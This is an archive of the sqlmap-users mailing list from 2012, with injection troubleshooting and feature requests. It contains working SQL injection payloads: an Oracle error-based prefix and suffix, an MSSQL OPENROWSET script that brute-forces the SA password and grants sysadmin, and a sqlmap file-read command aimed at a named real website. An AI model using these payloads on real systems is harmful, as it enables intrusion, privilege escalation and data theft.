sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Injecting into LIMIT ints

[Chris O. <chr...@gm...>]

Thanks Miroslav, I'll give it a go!

On 3 August 2012 16:15, Miroslav Stampar <mir...@gm...> wrote:

> Hi Chris.
>
> In those kind of cases UNION injection should be a solution.
>
> As LIMIT doesn't accept subquery as an operand you have to append a UNION
> ALL SELECT to the original value (foo in your case) and necessarily add a
> comment to the end (e.g. --) to neutralize that second operand of affected
> LIMIT part.
>
> To make it short, LIMIT doesn't accept subqueries and standard non-UNION
> based injection techniques should fail (as they "seed" their payload into
> the affected SQL form - in this case LIMIT).
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm...
> > wrote:
>
>> Hi All
>>
>> I have found that an application has a rewritten URL element that ends up
>> in a SQL query.  The error message tells me that I'm injecting into the
>> LIMIT number at the end of the query.  This appears to be the only point of
>> injection for now.
>>
>> A simplified version of the query that's being injected into is:
>>
>> SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
>> created_date DESC LIMIT foo, 10
>>
>> 'foo' is my injection and of course gives a syntax error.
>>
>> I know that apostrophes/ticks (as in the ' character) are blocked as a
>> minimum.
>>
>> Does anyone have any experience injecting this late in a query?  Any
>> ideas would be greatly received.
>>
>> Regards
>>
>> Chris
>>
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond. Discussions
>> will include endpoint security, mobile security and the latest in malware
>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

[sqlmap-users] sqlmap error

[D A. <je...@ho...>]

hi 

im try to run sqlmap from msf but i keep getting this error 

the sqlmap script could not be found:

iv already had sqlmap path to system Path envirounment put im still getting this error.

can u tell me what i can do from here.

Thank you! 
 		 	   		  

Re: [sqlmap-users] Injecting into LIMIT ints

[Miroslav S. <mir...@gm...>]

Hi Chris.

In those kind of cases UNION injection should be a solution.

As LIMIT doesn't accept subquery as an operand you have to append a UNION
ALL SELECT to the original value (foo in your case) and necessarily add a
comment to the end (e.g. --) to neutralize that second operand of affected
LIMIT part.

To make it short, LIMIT doesn't accept subqueries and standard non-UNION
based injection techniques should fail (as they "seed" their payload into
the affected SQL form - in this case LIMIT).

Kind regards,
Miroslav Stampar

On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley
<chr...@gm...>wrote:

> Hi All
>
> I have found that an application has a rewritten URL element that ends up
> in a SQL query.  The error message tells me that I'm injecting into the
> LIMIT number at the end of the query.  This appears to be the only point of
> injection for now.
>
> A simplified version of the query that's being injected into is:
>
> SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
> created_date DESC LIMIT foo, 10
>
> 'foo' is my injection and of course gives a syntax error.
>
> I know that apostrophes/ticks (as in the ' character) are blocked as a
> minimum.
>
> Does anyone have any experience injecting this late in a query?  Any ideas
> would be greatly received.
>
> Regards
>
> Chris
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Injecting into LIMIT ints

[Chris O. <chr...@gm...>]

Hi All

I have found that an application has a rewritten URL element that ends up
in a SQL query.  The error message tells me that I'm injecting into the
LIMIT number at the end of the query.  This appears to be the only point of
injection for now.

A simplified version of the query that's being injected into is:

SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC,
created_date DESC LIMIT foo, 10

'foo' is my injection and of course gives a syntax error.

I know that apostrophes/ticks (as in the ' character) are blocked as a
minimum.

Does anyone have any experience injecting this late in a query?  Any ideas
would be greatly received.

Regards

Chris

[sqlmap-users] Disable output coloring

[M Z. <rob...@gm...>]

I often redirect sqlmap output to a text file with the command >, and 
that leave annoying marks like 
[0m

at the beginning and the end of lines, and I have to clean that out.
Is there a way to disable output coloring?

Re: [sqlmap-users] Help read file

[Miroslav S. <mir...@gm...>]

Hi Jorge.

Dennis is right. Posting real targets on this ML is considered as an
inappropriate.

In your case you are most probably having problems with backend DBMS
permissions as in majority of similar cases.

In such cases switches -t and/or --parse-errors are great for debugging
purposes.

Kind regards,
Miroslav Stampar

On Mon, Jul 30, 2012 at 8:59 AM, Dennis <kor...@ya...> wrote:

> Hi Jorge,
>
> please do not post any vulnerabilities of real web pages to the mailing
> list. Could get you or anyone replying into trouble.
>
> Cheers,
> Dennis
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Help read file

[Dennis <kor...@ya...>]

Hi Jorge,

please do not post any vulnerabilities of real web pages to the mailing
list. Could get you or anyone replying into trouble.

Cheers,
Dennis

[sqlmap-users] Help read file

[Jorge V. <jv...@co...>]

Hi, great tool.

 

I could never read or write a file on the server, I don't know why.

 

For example this vulnerable web:

 

python sqlmap.py -u "http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL"
--file-read "/www/redpat.tv/htdocs/php/multimedia/p3.php" -v 5

 

It return the error: /www/redpat.tv/htdocs/php/multimedia/p3.php file saved
to:    'None'

 

If you go to:

http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL'

you can see selecting to see the text, that the path on the server is right,
thanks to the error message.

 

Hope you can help me, thanks.

 


Jorge Vespa
COTASnet
3862818 
Santa Cruz - Bolivia 

 

 

Re: [sqlmap-users] TypeError: argument of type 'NoneType' is not iterable

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report and find it fixed with the latest commit [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/126

On Sat, Jul 28, 2012 at 1:33 PM, M Zverev <rob...@gm...> wrote:

> [15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96,
> retry your run with the latest development version from the G
> itHub repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. Th
> e developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-dba0a96
> Python version: 2.7.3
> Operating system: nt
> Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u
> *************************************** -D ****** -T *********** --dump
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>    File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
>      start()
>    File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in
> start
>      action()
>    File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action
>      conf.dbmsHandler.dumpTable()
>    File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634,
> in dumpTable
>      entries = inject.getValue(query, blind=False, dump=True)
>    File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue
>      value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL
> else query, unpack, dump)
>    File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband
>      output = unionUse(expression, unpack=unpack, dump=dump)
>    File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in
> unionUse
>      value = __oneShotUnionUse(expression, unpack)
>    File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in
> __oneShotUnionUse
>      if kb.chars.stop not in page and kb.chars.stop[:-1] in page:
> TypeError: argument of type 'NoneType' is not iterable
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] TypeError: argument of type 'NoneType' is not iterable

[M Z. <rob...@gm...>]

[15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96, 
retry your run with the latest development version from the G
itHub repository. If the exception persists, please send by e-mail to 
'sql...@li...' or open a new issue at
'https://github.com/sqlmapproject/sqlmap/issues/new' with the following 
text and any information required to reproduce the bug. Th
e developers will try to reproduce the bug, fix it accordingly and get 
back to you.
sqlmap version: 1.0-dev-dba0a96
Python version: 2.7.3
Operating system: nt
Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u 
*************************************** -D ****** -T *********** --dump
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
   File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
     start()
   File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in 
start
     action()
   File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action
     conf.dbmsHandler.dumpTable()
   File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, 
in dumpTable
     entries = inject.getValue(query, blind=False, dump=True)
   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue
     value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL 
else query, unpack, dump)
   File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband
     output = unionUse(expression, unpack=unpack, dump=dump)
   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in 
unionUse
     value = __oneShotUnionUse(expression, unpack)
   File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in 
__oneShotUnionUse
     if kb.chars.stop not in page and kb.chars.stop[:-1] in page:
TypeError: argument of type 'NoneType' is not iterable

Re: [sqlmap-users] Add a new Injection-Type to sqlmap?

[Miroslav S. <mir...@gm...>]

Hi.

We have something similar already covered, but your payload is original for
sure. We'll probably include it as a standard one. Will let you know.

Kind regards,
Miroslav Stampar

On Thu, Jul 26, 2012 at 11:02 AM, whp <wh...@po...> wrote:

> Hi list/developer
>
> I stumbled over this type of injection while doing a pentest and thought of
> implementing this kind of injection in sqlmap (I call is
> "error-based-blind-injection"):
>
> The Webapp replied with "success", if the statement was correct,
> regardless of
> the number of returned rows (the rows actually were fetched in a subsequent
> request). And with an empty respons, if the statement failed. So the
> attack was
> identified the following way (It is a Oracle DB):
>
> param=' and to_char(1/0) like '1 --> empty response because 1/0 is a
> devision
> by zero error
> param=' and to_char(1/1) like '1 --> success
>
> Now I had to find a workaround to get sqlmap to identify this injection (it
> only identified a time based blind, but I wanted a _fast_ attack)
>
> My solution:
> prefix= ' and to_char(1/(case (select 'a' from dual where 1=1
> suffix=  ) when 'a' then '1' else '0' end)) like '1
>
> Know my question: is it possible to get this attack in sqlmap as a standard
> attack - or is there an easier way to configure sqlmap?
>
> Additionaly the oracle -"order by" clause injection via a case-statement
> would
> be interesting.
>
> Your opinions/suggestions?
>
> Chris
> --
> whp_at_pohlcity_dot_de
>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] problem with data retrieving - part of it comes out as rubbish

[Miroslav S. <mir...@gm...>]

Hi Daniel.

This is most probably because "Hebrew" was not recognized as a proper
charset there, hence proper decoding could not been done

Could you please send more information (maybe in private)? Traffic file (-t
traffic.txt) could be enough.

Kind regards,
Miroslav Stampar

On Fri, Jul 27, 2012 at 7:48 AM, Daniel Shapira <don...@gm...>wrote:

> hey,
> i have a strange problem on data retrieving with Mycrosoft SQL server -
> error based
> i use this command python sqlmap.py --risk=3 --level=5 -u "www.test.com"
> -p x  --threads=10 --dump-all --random-agent  -o --flush-session
>  --technique=EUS
>
> now some of the data is good
> but parts of some data comes out like this:
> [08:46:23] [INFO] retrieved: \\xe2\\xec\\xe9\\xf7\\xf1\\xe1\\xf8\\xe2
>
> i should point the the site is on Hebrew
> so the data also may be hebrew so i assumed that maybe the terminal can't
> display it but it is the same on the log files
> what can be the problem?
> thanks
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] problem with data retrieving - part of it comes out as rubbish

[Daniel S. <don...@gm...>]

hey,
i have a strange problem on data retrieving with Mycrosoft SQL server -
error based
i use this command python sqlmap.py --risk=3 --level=5 -u "www.test.com" -p
x  --threads=10 --dump-all --random-agent  -o --flush-session
 --technique=EUS

now some of the data is good
but parts of some data comes out like this:
[08:46:23] [INFO] retrieved: \\xe2\\xec\\xe9\\xf7\\xf1\\xe1\\xf8\\xe2

i should point the the site is on Hebrew
so the data also may be hebrew so i assumed that maybe the terminal can't
display it but it is the same on the log files
what can be the problem?
thanks

[sqlmap-users] Add a new Injection-Type to sqlmap?

[whp <wh...@po...>]

Hi list/developer

I stumbled over this type of injection while doing a pentest and thought of
implementing this kind of injection in sqlmap (I call is
"error-based-blind-injection"):

The Webapp replied with "success", if the statement was correct, regardless of
the number of returned rows (the rows actually were fetched in a subsequent
request). And with an empty respons, if the statement failed. So the attack was
identified the following way (It is a Oracle DB):

param=' and to_char(1/0) like '1 --> empty response because 1/0 is a devision
by zero error
param=' and to_char(1/1) like '1 --> success

Now I had to find a workaround to get sqlmap to identify this injection (it
only identified a time based blind, but I wanted a _fast_ attack)

My solution:
prefix= ' and to_char(1/(case (select 'a' from dual where 1=1
suffix=  ) when 'a' then '1' else '0' end)) like '1

Know my question: is it possible to get this attack in sqlmap as a standard
attack - or is there an easier way to configure sqlmap?

Additionaly the oracle -"order by" clause injection via a case-statement would
be interesting.

Your opinions/suggestions?

Chris
--  
whp_at_pohlcity_dot_de

Re: [sqlmap-users] Injection into columns list

[Dennis <kor...@ya...>]

Hey,

haven't spent any thinking on a generic approach yet as I was on an
Oracle DBMS and did fine. But I see your point... I will give it a
thought...

Cheers,
Dennis


Am 25.07.2012 12:09, schrieb Miroslav Stampar:
> Hi again.
>
> Most generic approach would be to use dummy prefix as "99999 WHERE
> 1=1", but there are lots of potential pitfalls here (e.g. if column
> name is delimited with a DBMS specific column name delimiter). We've
> added a new issue for this [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/120
>
> On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar
> <mir...@gm... <mailto:mir...@gm...>> wrote:
>
>     Hi.
>
>     How would you exploit this:
>
>     SELECT $_GET['id'] FROM table
>
>     on all DBMSes?
>
>     Oracle and MySQL have DUAL but what with others? At the end we'll
>     end with 10 new payloads and/or boundaries each of those covering
>      each DBMS.
>
>     Kind regards,
>     Miroslav Stampar
>
>
>     On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...
>     <mailto:kor...@ya...>> wrote:
>
>         I'm not sure about Troy, but I had a similar case recently. I
>         could control the bit of the query between SELECT and FROM,
>         which could be exploited either with nested (SELECT)s or by
>         expanding the query with another FROM [...] UNION SELECT [...]
>         to extend the query. SQLmap did not find the injection. The
>         DBMS was Oracle.
>
>         Cheers
>
>
>         Am 25.07.2012 00 <tel:25.07.2012%2000>:48, schrieb Miroslav
>         Stampar:
>>
>>         Hi Troy.
>>
>>         More info is required for sure.
>>
>>         You mean that you just need a (SELECT...)/subquery type of
>>         injection? This is something that we are aware that we need
>>         to do.
>>
>>         Kind regards,
>>         Miroslav Stampar
>>
>>         On Jul 24, 2012 11:18 PM, "Troy B"
>>         <pow...@gm...
>>         <mailto:pow...@gm...>> wrote:
>>
>>             Evening all,
>>
>>             I had an SQL injection into a MySQL5-based web
>>             application the other week which involved me having
>>             control over the column list being selected.  I tried
>>             sqlmap against the URL, but it didn't find the injection
>>             point.  I tried again,  taking the --level and --risk a
>>             little higher, but still nothing.
>>
>>             In the end, I manually exploited it using a sub-select.
>>             Was I doing something wrong with sqlmap, or will it not
>>             identify injection points like that?  I can provide an
>>             example of the query the application was using if this helps.
>>
>>             Regards,
>>
>>             Matt
>>
>>             ------------------------------------------------------------------------------
>>             Live Security Virtual Conference
>>             Exclusive live event will cover all the ways today's
>>             security and
>>             threat landscape has changed and how IT managers can
>>             respond. Discussions
>>             will include endpoint security, mobile security and the
>>             latest in malware
>>             threats.
>>             http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>             _______________________________________________
>>             sqlmap-users mailing list
>>             sql...@li...
>>             <mailto:sql...@li...>
>>             https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>         ------------------------------------------------------------------------------
>>         Live Security Virtual Conference
>>         Exclusive live event will cover all the ways today's security and 
>>         threat landscape has changed and how IT managers can respond. Discussions 
>>         will include endpoint security, mobile security and the latest in malware 
>>         threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>
>>
>>         _______________________________________________
>>         sqlmap-users mailing list
>>         sql...@li... <mailto:sql...@li...>
>>         https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>
>     -- 
>     Miroslav Stampar
>     http://about.me/stamparm
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] bruteforce SA password using SQL INJECTION

[Bernardo D. A. G. <ber...@gm...>]

Hi Juan,

master.dbo.xp_execresultset is a stored extended procedure available
on Microsoft SQL Server 2000. It is not availabe on MSSQL 2005/2008
onwards by default, hence the error message and the DBA brute force
attack fails.

Bernardo


On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:
> I was trying sqlninja.
>
> this is the query it use for bruteforce SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar
> (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37
> begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set
> @p=@p+@z set @q=N'select 1 from
> OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
> 1;exec master.dbo.sp_addsrvrolemember
> '''''+system_user+N''''',''''sysadmin'''' '')' exec
> master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> but I am receiving this error:
>
>
> Could not find stored procedure 'master.dbo.xp_execresultset'.
>
> it was in the HTTP response. this error is because the "openrowset" is
> disable? or is just that the "SA" password is not the correct. (like
> "password wrong" error).
>
> there is any way to check if "openrowset" is enable?
>
>
> thanks.
>
>
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
>>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by thereforce, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > there is a way for bruteforce the SA password using SQL INJECTION?
>> >
>> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
>> > access to the internet (it has the 1433 port blocked),
>> > the current user is a normal user (low privileges User). cannot get SA
>> > hash
>> > password.
>> >
>> > the question is, is there any tool or code or way to bruteforce the SA
>> > password? without direct access to the Sql Server?
>> >
>> > It is a request for add this functionality to SQLMAP, I don't know if is
>> > possible.
>> >
>> > Thanks.
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > Live Security Virtual Conference
>> > Exclusive live event will cover all the ways today's security and
>> > threat landscape has changed and how IT managers can respond.
>> > Discussions
>> > will include endpoint security, mobile security and the latest in
>> > malware
>> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] Injection into columns list

[Miroslav S. <mir...@gm...>]

Hi again.

Most generic approach would be to use dummy prefix as "99999 WHERE 1=1",
but there are lots of potential pitfalls here (e.g. if column name is
delimited with a DBMS specific column name delimiter). We've added a new
issue for this [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/120

On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> How would you exploit this:
>
> SELECT $_GET['id'] FROM table
>
> on all DBMSes?
>
> Oracle and MySQL have DUAL but what with others? At the end we'll end with
> 10 new payloads and/or boundaries each of those covering  each DBMS.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote:
>
>>  I'm not sure about Troy, but I had a similar case recently. I could
>> control the bit of the query between SELECT and FROM, which could be
>> exploited either with nested (SELECT)s or by expanding the query with
>> another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not
>> find the injection. The DBMS was Oracle.
>>
>> Cheers
>>
>>
>> Am 25.07.2012 00:48, schrieb Miroslav Stampar:
>>
>> Hi Troy.
>>
>> More info is required for sure.
>>
>> You mean that you just need a (SELECT...)/subquery type of injection?
>> This is something that we are aware that we need to do.
>>
>> Kind regards,
>> Miroslav Stampar
>> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...>
>> wrote:
>>
>>> Evening all,
>>>
>>>  I had an SQL injection into a MySQL5-based web application the other
>>> week which involved me having control over the column list being selected.
>>>  I tried sqlmap against the URL, but it didn't find the injection point.  I
>>> tried again,  taking the --level and --risk a little higher, but still
>>> nothing.
>>>
>>>  In the end, I manually exploited it using a sub-select. Was I doing
>>> something wrong with sqlmap, or will it not identify injection points like
>>> that?  I can provide an example of the query the application was using if
>>> this helps.
>>>
>>>  Regards,
>>>
>>>  Matt
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Live Security Virtual Conference
>>> Exclusive live event will cover all the ways today's security and
>>> threat landscape has changed and how IT managers can respond. Discussions
>>> will include endpoint security, mobile security and the latest in malware
>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond. Discussions
>> will include endpoint security, mobile security and the latest in malware
>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>
>>
>>
>> _______________________________________________
>> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Injection into columns list

[Miroslav S. <mir...@gm...>]

Hi.

How would you exploit this:

SELECT $_GET['id'] FROM table

on all DBMSes?

Oracle and MySQL have DUAL but what with others? At the end we'll end with
10 new payloads and/or boundaries each of those covering  each DBMS.

Kind regards,
Miroslav Stampar

On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote:

>  I'm not sure about Troy, but I had a similar case recently. I could
> control the bit of the query between SELECT and FROM, which could be
> exploited either with nested (SELECT)s or by expanding the query with
> another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not
> find the injection. The DBMS was Oracle.
>
> Cheers
>
>
> Am 25.07.2012 00:48, schrieb Miroslav Stampar:
>
> Hi Troy.
>
> More info is required for sure.
>
> You mean that you just need a (SELECT...)/subquery type of injection? This
> is something that we are aware that we need to do.
>
> Kind regards,
> Miroslav Stampar
> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...>
> wrote:
>
>> Evening all,
>>
>>  I had an SQL injection into a MySQL5-based web application the other
>> week which involved me having control over the column list being selected.
>>  I tried sqlmap against the URL, but it didn't find the injection point.  I
>> tried again,  taking the --level and --risk a little higher, but still
>> nothing.
>>
>>  In the end, I manually exploited it using a sub-select. Was I doing
>> something wrong with sqlmap, or will it not identify injection points like
>> that?  I can provide an example of the query the application was using if
>> this helps.
>>
>>  Regards,
>>
>>  Matt
>>
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond. Discussions
>> will include endpoint security, mobile security and the latest in malware
>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>
>
>
> _______________________________________________
> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Injection into columns list

[Dennis <kor...@ya...>]

I'm not sure about Troy, but I had a similar case recently. I could
control the bit of the query between SELECT and FROM, which could be
exploited either with nested (SELECT)s or by expanding the query with
another FROM [...] UNION SELECT [...] to extend the query. SQLmap did
not find the injection. The DBMS was Oracle.

Cheers


Am 25.07.2012 00:48, schrieb Miroslav Stampar:
>
> Hi Troy.
>
> More info is required for sure.
>
> You mean that you just need a (SELECT...)/subquery type of injection?
> This is something that we are aware that we need to do.
>
> Kind regards,
> Miroslav Stampar
>
> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...
> <mailto:pow...@gm...>> wrote:
>
>     Evening all,
>
>     I had an SQL injection into a MySQL5-based web application the
>     other week which involved me having control over the column list
>     being selected.  I tried sqlmap against the URL, but it didn't
>     find the injection point.  I tried again,  taking the --level and
>     --risk a little higher, but still nothing.
>
>     In the end, I manually exploited it using a sub-select. Was I
>     doing something wrong with sqlmap, or will it not identify
>     injection points like that?  I can provide an example of the query
>     the application was using if this helps.
>
>     Regards,
>
>     Matt
>
>     ------------------------------------------------------------------------------
>     Live Security Virtual Conference
>     Exclusive live event will cover all the ways today's security and
>     threat landscape has changed and how IT managers can respond.
>     Discussions
>     will include endpoint security, mobile security and the latest in
>     malware
>     threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and 
> threat landscape has changed and how IT managers can respond. Discussions 
> will include endpoint security, mobile security and the latest in malware 
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] bruteforce SA password using SQL INJECTION

[Chris O. <chr...@gm...>]

Hi Juan

I'm not convinced it's due to either of your suggestions.

If openrowset is disabled, you'll get an error message that begins
something like:

SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of
component 'Ad Hoc Distributed Queries' because this component is turned off
as part of the security configuration for this server.

The statement that your instance of SQLNinja is sending out differs from
mine (are you using -m b -w /path/to/wordlist.txt)?  My queries looks
similar to this:

select * from
OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=sa;pwd=passwordguess','waitfor
delay ''0:0:59'';select 1;');--

